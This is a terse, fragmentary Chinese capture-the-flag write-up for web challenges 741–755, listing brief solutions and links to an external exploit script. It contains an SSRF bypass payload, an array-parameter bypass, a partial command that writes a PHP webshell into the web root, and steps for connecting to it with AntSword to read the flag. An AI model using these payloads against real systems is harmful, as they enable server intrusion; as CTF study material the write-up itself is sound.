因为题目较多,所以很多地方写的比较简略,望师傅们谅解,祝大家变得更强!
文章目录
web741
- web741
- web742
- web743
- web744
- web745
- web746
- web747
- web748
- web749
- web750
- web751
- web752
- web753
- web754
- web755
ssrf绕过 url=http://0.0.0.0:8080/flag
web742 web743a[]=1&b[]=2&c[]=1&d[]=2
' > /var/www/html/b.php;
蚁剑连上后运行/readflag 然后会在/tmp下生成一个flag,读取即可。
web755源码
https://github.com/farazsth98/CTF/tree/master/zer0ptsctf/guestfs_afr/challenge
payload
https://github.com/farazsth98/CTF/blob/master/zer0ptsctf/guestfs_afr/exploit.py
放弃了。。。。